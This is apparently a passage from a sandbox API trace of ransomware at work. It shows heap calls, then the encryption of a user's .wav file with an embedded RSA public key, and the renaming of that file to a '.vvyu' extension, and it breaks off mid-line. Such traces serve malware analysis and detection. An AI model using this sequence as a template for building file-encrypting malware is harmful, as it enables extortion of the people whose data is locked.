0x2c85d88 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3098 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.047] GetCurrentThreadId () returned 0x66c [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6220 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.047] GetCurrentThreadId () returned 0x66c [0199.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0199.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0199.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3140 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3158 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0199.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0199.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddc18 | out: hHeap=0x620000) returned 1 [0199.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.058] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x14385, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x14385, lpOverlapped=0x0) returned 1 [0199.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.060] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1438a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.060] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.061] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.062] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.062] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.062] CloseHandle (hObject=0x510) returned 1 [0199.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0199.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.064] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\KnG7feMIAKlEoa_UW1s2.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\kng7femiakleoa_uw1s2.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\KnG7feMIAKlEoa_UW1s2.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\kng7femiakleoa_uw1s2.wav.vvyu")) returned 1 [0199.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.066] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.069] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46289bb0, ftCreationTime.dwHighDateTime=0x1d8987d, ftLastAccessTime.dwLowDateTime=0xe60c5980, ftLastAccessTime.dwHighDateTime=0x1d8a1f8, ftLastWriteTime.dwLowDateTime=0xe60c5980, ftLastWriteTime.dwHighDateTime=0x1d8a1f8, nFileSizeHigh=0x0, nFileSizeLow=0x51cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbnh H.wav", cAlternateFileName="RBNHH~1.WAV")) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0199.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.069] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rbnh H.wav") returned=".wav" [0199.069] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rbnh H.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\rbnh h.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.070] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=20943) returned 1 [0199.070] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.073] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x51a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.073] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.076] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.076] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x51cf, lpOverlapped=0x0) returned 1 [0199.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.077] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.078] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.078] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.078] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.078] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.079] GetLastError () returned 0x0 [0199.079] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.079] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.079] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.079] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.079] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x51d0) returned 0x2ea79b0 [0199.079] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddc18 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f300 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 